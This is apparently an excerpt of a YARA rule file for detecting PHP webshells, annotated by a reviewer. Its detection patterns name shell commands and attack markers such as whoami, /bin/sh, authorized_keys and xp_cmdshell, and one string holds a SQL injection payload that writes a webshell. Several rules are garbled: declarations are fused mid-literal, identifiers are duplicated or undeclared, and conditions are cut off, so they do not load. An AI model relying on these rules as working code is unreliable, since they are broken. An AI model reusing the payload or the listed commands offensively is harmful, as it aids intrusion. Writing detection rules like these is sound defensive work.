    	filesize < 500KB and not ( uint16(0) == 0x5a4d or $dex at 0 or $pack at 0 or uint16(0) == 0x4b50 ) and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $dynamic* ) ) and ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) )
    }
    // Generic PHP callback-based shell detector: a request-input marker ($inp*) feeding one of the
    // PHP callback-taking functions ($callback* / $m_callback*), minus known goodware ($gfp*) and
    // known callback false positives ($cfp*), gated by a size-scaled count of suspicious strings.
    // NOTE(review): as captured this rule does not load -- $cfp3 below is a broken declaration (see
    // the note at that line). Restore the rule from upstream rather than editing the fragment.
    rule Php_Webshell_webshell_php_generic_callback
    {
    strings:
    	$gfp1 = "eval(\"return [$serialised_parameter" // elgg
    	$gfp2 = "$this->assert(strpos($styles, $"
    	$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
    	$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
    	$gfp5 = "$_POST[partition_by]($_POST["
    	$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
    	$gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;)
    	$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
    	$gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
    	$gfp10 = "[][}{;|]\\|\\\\[+=]\\|?"
    	$gfp11 = "(eval (getenv \"EPROLOG\")))"
    	$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
    	$gfp_tiny3 = /(echo shell_exec\(\$|assert\('array_key_exists\(|assert\(FALSE\)|assert\(false\)|include "\.\/common\.php")|\(('[\d,a-zA-Z]',){3}/ ascii
    	// Request-input markers: superglobals, php://input, HTTP_* headers, remote file_get_contents.
    	$inp1 = "php://input" wide ascii
    	$inp2 = /_GET\s?\[/  ascii
    	$inp3 = /\(\s?\$_GET\s?\)/  ascii
    	$inp4 = /_POST\s?\[/  ascii
    	$inp5 = /\(\s?\$_POST\s?\)/  ascii
    	$inp6 = /_REQUEST\s?\[/  ascii
    	$inp7 = /\(\s?\$_REQUEST\s?\)/  ascii
    	$inp15 = "_SERVER['HTTP_" wide ascii
    	$inp16 = "_SERVER[\"HTTP_" wide ascii
    	$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/  ascii
    	$inp18 = "array_values($_SERVER)" wide ascii
    	$inp19 = /file_get_contents\("https?:\/\//  ascii
    	// PHP functions that take a callable; "\b...[\t ]*\([^)]" requires an opened, non-empty call.
    	$callback1 = /(\bmb_ereg_replace_callback[\t ]*\([^)]|\bsqlite_create_function[\t ]*\([^)]|\bsqlite_create_aggregate[\t ]*\([^)]|\bsession_set_save_handler[\t ]*\([^)]|\bset_exception_handler[\t ]*\([^)]|\bset_error_handler[\t ]*\([^)]|\bregister_tick_function[\t ]*\([^)])/ ascii
    	$callback2 = /(\barray_udiff_assoc[\t ]*\([^)]|\barray_reduce[\t ]*\([^)]|\barray_map[\t ]*\([^)]|\barray_intersect_ukey[\t ]*\([^)]|\barray_intersect_uassoc[\t ]*\([^)]|\barray_filter[\t ]*\([^)]|\barray_diff_ukey[\t ]*\([^)]|\barray_diff_uassoc[\t ]*\([^)]|\bob_start[\t ]*\([^)])/ ascii
    	$callback3 = /(\bregister_shutdown_function[\t ]*\([^)]|\bcall_user_func_array[\t ]*\([^)]|\bcall_user_func[\t ]*\([^)]|\biterator_apply[\t ]*\([^)]|\bspl_autoload_register[\t ]*\([^)]|\bpreg_replace_callback[\t ]*\([^)]|\busort[\t ]*\([^)]|\buksort[\t ]*\([^)]|\buasort[\t ]*\([^)])/ ascii
    	$callback4 = /(forward_static_call_array|\bassert_options[\t ]*\([^)]|\barray_walk[\t ]*\([^)]|\barray_walk_recursive[\t ]*\([^)]|\barray_uintersect[\t ]*\([^)]|\barray_uintersect_uassoc[\t ]*\([^)]|\barray_uintersect_assoc[\t ]*\([^)]|\barray_udiff[\t ]*\([^)]|\barray_udiff_uassoc[\t ]*\([^)])/ ascii
    	// filter_var() only counts together with FILTER_CALLBACK ("all of ($m_callback*)").
    	$m_callback1 = /\bfilter_var[\t ]*\([^)]/ nocase  ascii
    	$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
    	$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase  ascii
    	$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
    	// NOTE(review): $cfp3 is not a valid declaration. It opens with "" and then runs as a bare
    	// alternation that ends three lines down with ")/ ascii" -- the head of one literal and the
    	// tail of a regex were fused during extraction, and whatever declarations sat between them
    	// are missing. Restore $cfp3 and the intervening strings from the upstream rule.
    	$cfp3 = ""\.|\$cmd|\$password="|\$password='|whoami|portscan|Cyber|\/bin\/sh|"execute"|'cmd'|dumper|\.ssh\/authorized_keys| \^ \$|suhosin|bypass|Shell|shell_|
    |
    |crack|Content-Transfer-Encoding: Binary)/ ascii
    	// NOTE(review): only one $gen_bit_sus* string survives here, so the "2/3/4 of ($gen_bit_sus*)"
    	// alternatives in the condition can never hold; the $gen_much_sus* alternatives still work.
    	$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/  ascii
    	$gen_much_sus37 = /(rootkit|Rootkit|grayhat|hacker|hacked|HACKED|Hacker|TVqQAAMAAA|Exploit|exploit|'unsafe|"unsafe|nishang|McAfee|antivirus|pcAnywhere|WScript\.Shell\.1|hidded shell|WebShell|Web Shell)/ ascii
    	$gen_much_sus38 = /(eval\(eval\(|\("\/\*\/"|\/\*\/\/\*\/|"u"\+"e|q"\+"u"|"\+"\("\+"|a"\+"l"|"e"\+"v|u"\+"n"\+"s|\/\*-\/\*-\*\/)/ ascii
    	$gen_much_sus48 = /(-name config\.inc\.php|grep -li password|-perm -02000|-perm -04000|_\.=\$_|\+\+;\$|\+\+; \$|_=\$\$_|-Expire=0|PasswordType=Regular|Shell\.Users|unlink\(__FILE__\))/  ascii
    	$gen_much_sus75 = /(password crack|mysqlDll\.dll|net user|suhosin\.executor\.disable_|disabled_suhosin|fopen\("\.htaccess","w|strrev\(['"]|PHPShell|PHP Shell|phpshell|PHPshell|deface|Deface|backdoor|r00t|xp_cmdshell)/ ascii
    	$gif = { 47 49 46 38 }
    condition:
    	// "not any of ($gfp*)" matches identifiers by prefix and so already covers $gfp_tiny3; the
    	// separate $gfp_tiny* clause is redundant but harmless. Files under 1000 bytes skip the
    	// suspicious-string count entirely; larger files need more hits the bigger they get.
    	not ( any of ( $gfp* ) ) and not ( any of ( $gfp_tiny* ) ) and ( any of ( $inp* ) ) and ( not any of ( $cfp* ) and ( any of ( $callback* )  or all of ( $m_callback* ) ) ) and ( filesize < 1000 or ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) ) )
    }
    // .htaccess that maps its own extension onto the PHP handler, so the file
    // itself is executed as PHP. One directive, file under 100KB.
    rule Php_Webshell_webshell_php_in_htaccess
    {
        strings:
            $hta = "AddType application/x-httpd-php .htaccess" wide ascii
        condition:
            $hta and filesize < 100KB
    }
    // PHP code hidden inside an image container (GIF / JFIF / PNG header).
    // NOTE(review): this rule does not load as captured and should be restored from upstream:
    //  - $gif is declared twice (a regex here, a hex string at the bottom of the block);
    //  - $php_tag and $php_short are truncated declarations (see the notes at those lines);
    //  - the condition references $gfp_tiny*, $no_*, $php_new*, $inp*, $cpayload*,
    //    $m_cpayload_preg_filter*, $wfp_tiny* and $cmpayload*, none of which is declared here;
    //  - $jfif and $png are declared but never used by the condition.
    // The identifier "Torjan" is presumably a typo for "Trojan"; renaming it changes the rule name
    // callers see, so it is left alone here.
    rule Php_Webshell_Torjan_webshell_in_image_picture_php
    {
    strings:
    	$gif = /^GIF8[79]a/
    	$jfif = { ff d8 ff e? 00 10 4a 46 49 46 }
    	$png = { 89 50 4e 47 0d 0a 1a 0a }
    	// NOTE(review): $php_tag opens a text literal but ends with the tail of a regex ("...php";/ ascii");
    	// the text between the two was lost during extraction.
    	$php_tag = "&1'\);|assert\('array_key_exists\(|assert\(FALSE\);|assert\(false\);|assert\('FALSE'\);|include \".\/common\.php";/ ascii
    	// NOTE(review): same fusion as above -- "" followed by a bare alternation that closes three lines down.
    	$php_short = ""\.|\$cmd|\$password="|\$password='|whoami|portscan|Cyber|\/bin\/sh|"execute"|'cmd'|dumper|\.ssh\/authorized_keys| \^ \$|suhosin|bypass|Shell|shell_|
    |
    |crack|Content-Transfer-Encoding: Binary)/ ascii
    	$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/  ascii
    	$gen_much_sus37 = /(rootkit|Rootkit|grayhat|hacker|hacked|HACKED|Hacker|TVqQAAMAAA|Exploit|exploit|'unsafe|"unsafe|nishang|McAfee|antivirus|pcAnywhere|WScript\.Shell\.1|hidded shell|WebShell|Web Shell)/ ascii
    	$gen_much_sus38 = /(eval\(eval\(|\("\/\*\/"|\/\*\/\/\*\/|"u"\+"e|q"\+"u"|"\+"\("\+"|a"\+"l"|"e"\+"v|u"\+"n"\+"s|\/\*-\/\*-\*\/)/ ascii
    	$gen_much_sus48 = /(-name config\.inc\.php|grep -li password|-perm -02000|-perm -04000|_\.=\$_|\+\+;\$|\+\+; \$|_=\$\$_|-Expire=0|PasswordType=Regular|Shell\.Users|unlink\(__FILE__\))/  ascii
    	$gen_much_sus75 = /(password crack|mysqlDll\.dll|net user|suhosin\.executor\.disable_|disabled_suhosin|fopen\("\.htaccess","w|strrev\(['"]|PHPShell|PHP Shell|phpshell|PHPshell|deface|Deface|backdoor|r00t|xp_cmdshell)/ ascii
    	// NOTE(review): second declaration of $gif (duplicate identifier).
    	$gif = { 47 49 46 38 }
    condition:
    	not ( any of ( $gfp_tiny* ) ) and ( ( ( $php_short in (0..100) or $php_short in (filesize-1000..filesize) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( filesize < 1000 and not any of ( $wfp_tiny* ) ) or ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) and ( filesize > 5KB or not any of ( $wfp_tiny* ) ) ) or ( filesize < 500KB and ( 4 of ( $cmpayload* ) ) ) )
    }
    // PHP shells spotted by string-splitting / comment-splicing obfuscation of eval, assert,
    // base64_decode, gzinflate, chr, POST/GET/REQUEST and similar names.
    // NOTE(review): this rule does not load as captured. The string list is cut off at $opbs54
    // (see the note at that line): its literal never closes, the "condition:" keyword is missing,
    // and the surviving tail refers to $php_semi2, which is not declared. Restore from upstream.
    rule Php_Webshell_webshell_php_by_string_obfuscation
    {
    strings:
    	$opbs13 = "{\"_P\"./*-/*-*/\"OS\"./*-/*-*/\"T\"}" wide ascii
    	$opbs14 = "/*-/*-*/\"" wide ascii
    	$opbs16 = "'ev'.'al'" wide ascii
    	$opbs17 = "'e'.'val'" wide ascii
    	$opbs18 = "e'.'v'.'a'.'l" wide ascii
    	$opbs19 = "bas'.'e6'." wide ascii
    	$opbs20 = "ba'.'se6'." wide ascii
    	$opbs21 = "as'.'e'.'6'" wide ascii
    	$opbs22 = "gz'.'inf'." wide ascii
    	$opbs23 = "gz'.'un'.'c" wide ascii
    	$opbs24 = "e'.'co'.'d" wide ascii
    	$opbs25 = "cr\".\"eat" wide ascii
    	$opbs26 = "un\".\"ct" wide ascii
    	$opbs27 = "'c'.'h'.'r'" wide ascii
    	$opbs28 = "\"ht\".\"tp\".\":/\"" wide ascii
    	$opbs29 = "\"ht\".\"tp\".\"s:" wide ascii
    	// Same literal as $opbs16, but case-insensitive, so it matches a superset of $opbs16.
    	$opbs31 = "'ev'.'al'" nocase wide ascii
    	$opbs32 = "eval/*" nocase wide ascii
    	$opbs33 = "eval(/*" nocase wide ascii
    	$opbs34 = "eval(\"/*" nocase wide ascii
    	$opbs36 = "assert/*" nocase wide ascii
    	$opbs37 = "assert(/*" nocase wide ascii
    	$opbs38 = "assert(\"/*" nocase wide ascii
    	$opbs40 = "'ass'.'ert'" nocase wide ascii
    	$opbs41 = "${'_'.$_}['_'](${'_'.$_}['__'])" wide ascii
    	$opbs44 = "'s'.'s'.'e'.'r'.'t'" nocase wide ascii
    	$opbs45 = "'P'.'O'.'S'.'T'" wide ascii
    	$opbs46 = "'G'.'E'.'T'" wide ascii
    	$opbs47 = "'R'.'E'.'Q'.'U'" wide ascii
    	// $opbs48 onward carry no "wide" modifier (ascii only) -- inconsistent with the strings above.
    	$opbs48 = "se'.(32*2)" nocase
    	$opbs49 = "'s'.'t'.'r_'" nocase
    	$opbs50 = "'ro'.'t13'" nocase
    	$opbs51 = "c'.'od'.'e" nocase
    	$opbs53 = "e'. 128/2 .'_' .'d"
    	// NOTE(review): truncated here -- the literal opens and never closes, and what follows reads
    	// as the tail of the rule's condition ("... 2KB and ( $php_semi2 in (filesize-1000 .. filesize) ) )").
    	// Everything between the start of this literal and that tail was lost during extraction.
    	$opbs54 = " 2KB and ( $php_semi2 in (filesize-1000 .. filesize) ) )
    }
    // Tiny PHP files (20..200 bytes, per the surviving condition tail) that use dynamic
    // function calls, minus two known false positives ($pd_fp*).
    // NOTE(review): this rule does not load as captured. $php_short opens a literal that never
    // closes; the text after it reads as the tail of the condition (the "condition:" keyword is
    // missing), and that tail references $no_*, $php_new* and $dynamic*, none of which is declared
    // here. Restore the rule from upstream rather than repairing the fragment.
    rule Php_Webshell_webshell_php_dynamic
    {
    strings:
    	$pd_fp1 = "whoops_add_stack_frame" wide ascii
    	$pd_fp2 = "new $ec($code, $mode, $options, $userinfo);" wide ascii
    	// NOTE(review): truncated declaration -- see the note at the rule header.
    	$php_short = " 20 and filesize < 200 and ( ( ( $php_short in (0..100) or $php_short in (filesize-1000..filesize) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $dynamic* ) ) and not any of ( $pd_fp* )
    }
    // C# (ASP.NET) login page wiring plus a formatted "Host = ...; UserName = ...;
    // Password = ...; Databas" connection string. Both strings, file under 202KB.
    // The content is C#, not PHP, despite the Php_ prefix, and nothing in the
    // strings is MySQL-specific.
    rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_mysql
    {
        strings:
            $s1 = "txtpassword.Attributes.Add(\"onkeydown\", \"SubmitKeyClick('btnLogin');\");" fullword ascii
            $s2 = "connString = string.Format(\"Host = {0}; UserName = {1}; Password = {2}; Databas" ascii
        condition:
            all of them and filesize < 202KB
    }
    // PHP shell fingerprint: a phpversion()-prefixed info array and an
    // unserialize(sh_decrypt(base64_decode(...))) payload loader.
    // NOTE(review): the first disjunct of the condition is dead as written. uint32(0) == 0x68703f3c
    // (little-endian) requires the file to begin with the bytes "<?ph", while "$h1 at 0" requires it
    // to begin with "@phpversion", so the two can never hold together and the rule reduces to
    // "2 of them". Presumably $h1 lost a leading PHP open tag during extraction -- confirm against
    // the upstream rule and restore the literal rather than relaxing the offset check.
    // Also note precedence: "and" binds tighter than "or", so this parses as
    // ( uint32 check and $h1 at 0 and 1 of them ) or 2 of them.
    rule Php_Webshell_PHP_Webshell_1_Feb17
    {
    strings:
    	$h1 = "@phpversion(),\"\\x" ascii
    	$s1 = "$i=Array(\"pv\"=>@phpversion(),\"sv\"" ascii
    	$s3 = "$data = @unserialize(sh_decrypt(@base64_decode($data),$data_key));" ascii
    condition:
    	uint32(0) == 0x68703f3c and ( $h1 at 0 and 1 of them ) or 2 of them
    }